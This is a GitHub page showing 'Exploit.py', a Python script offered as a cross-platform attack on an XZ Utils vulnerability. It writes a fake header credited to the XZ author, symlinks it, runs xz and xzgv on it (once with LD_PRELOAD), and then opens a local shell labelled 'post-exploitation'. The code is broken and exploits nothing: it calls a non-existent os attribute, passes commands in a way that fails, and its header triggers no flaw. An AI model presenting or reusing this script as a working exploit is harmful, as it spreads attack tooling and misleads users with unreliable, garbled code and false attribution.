-
Notifications
You must be signed in to change notification settings - Fork 1
/
Exploit.py
73 lines (65 loc) · 2.03 KB
/
Exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
import subprocess
import os
import platform
# Create the exploit file
exploit_content = """
/*
* Copyright (c) 2010-2020 XZ Utils
*
* Author: Lasse Collin
*
* This file has been put into the public domain.
* You can do whatever you want with this file.
*
* See ../README for more details.
* https://github.com/AiGptCode/Xz_vulnerability_crossplatform
*/
#ifndef XZ_UTILS_H
#define XZ_UTILS_H
#define XX 0
#define __x() XX
"""
with open("exploit.txt", "w") as exploit_file:
exploit_file.write(exploit_content)
# Create a symbolic link or hard link depending on the OS
if platform.system() == 'Windows':
if os.symlink in os.supports_symlinks:
os.symlink(os.path.realpath('exploit.txt'), 'exploit_link')
else:
os.link(os.path.realpath('exploit.txt'), 'exploit_link')
else:
os.symlink(os.path.realpath('exploit.txt'), 'exploit_link')
# Define the exploit commands based on the OS
cmds = []
if platform.system() == 'Linux' or platform.system() == 'Darwin':
pthread_lib = 'libpthread.so' # Use default name and let dynamic linker search for it
cmds = [
["LD_PRELOAD={} xz -v exploit_link".format(pthread_lib)],
["xzgv exploit_link"]
]
elif platform.system() == 'Windows':
cmds = [
["xz -v exploit_link"],
["xzgv exploit_link"]
]
else:
print("Unsupported operating system.")
quit()
# Run the exploit commands with the malicious input file
for cmd in cmds:
input_file = "exploit_link"
try:
output = subprocess.check_output(cmd, stdin=open(input_file, 'r'), stderr=subprocess.STDOUT, universal_newlines=True)
print(output)
except subprocess.CalledProcessError as error:
print(error.output)
# Post-exploitation: Open a command shell based on the OS
post_exploit_cmd = ""
if platform.system() == 'Linux' or platform.system() == 'Darwin':
post_exploit_cmd = "/bin/bash"
elif platform.system() == 'Windows':
post_exploit_cmd = "cmd"
else:
print("Unsupported operating system.")
quit()
subprocess.Popen(post_exploit_cmd, shell=True)